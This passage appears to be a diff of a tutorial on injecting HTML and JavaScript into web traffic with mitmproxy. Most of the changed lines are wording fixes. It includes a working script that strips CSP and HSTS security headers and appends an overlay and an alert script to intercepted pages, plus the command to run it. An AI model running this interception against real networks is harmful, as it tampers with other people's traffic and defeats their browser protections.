 OVERLAY_HTML = b"<img style='z-index:10000;width:100%;height:100%;top:0;left:0;position:fixed;opacity:0.5' src='https://cdn.winknews.com/wp-content/uploads/2019/01/Police-lights.-Photo-via-CBS-News..jpg' />" OVERLAY_JS = b"<script>alert('You can\'t click anything on this page');</script>" def remove_header(response, header_name): if header_name in response.headers: del response.headers[header_name] def response(flow): # remove security headers in case they're present remove_header(flow.response, "Content-Security-Policy") remove_header(flow.response, "Strict-Transport-Security") # if content-type type isn't available, ignore if "content-type" not in flow.response.headers: return # if it's HTML & response code is 200 OK, then inject the overlay snippet (HTML & JS) if "text/html" in flow.response.headers["content-type"] and flow.response.status_code == 200: flow.response.content += OVERLAY_HTML flow.response.content += OVERLAY_JS

-The script checks if the response contains HTML data, and the response code is
+The script checks whether the response contains HTML data and whether the response code is

-The HTTP Strict Transport Security (HSTS) header tells the browser to only connect to this website via HTTPS in the future, if the browser gets this header, no man-in-the-middle will be possible when it will be acessing this website, until the HSTS rule expires.
+The HTTP Strict Transport Security (HSTS) header tells the browser to only connect to this website via HTTPS in the future.
+If the browser gets this header, no man-in-the-middle will be possible when it will be accessing this website until the HSTS rule expires.

-We save the above script under the name proxy.py and execute it via mitmproxy command:
+We save the above script under the name proxy.py and execute it via the mitmproxy command:

 $ mitmproxy --ignore '^(?!duckduckgo\.com)' -s proxy.py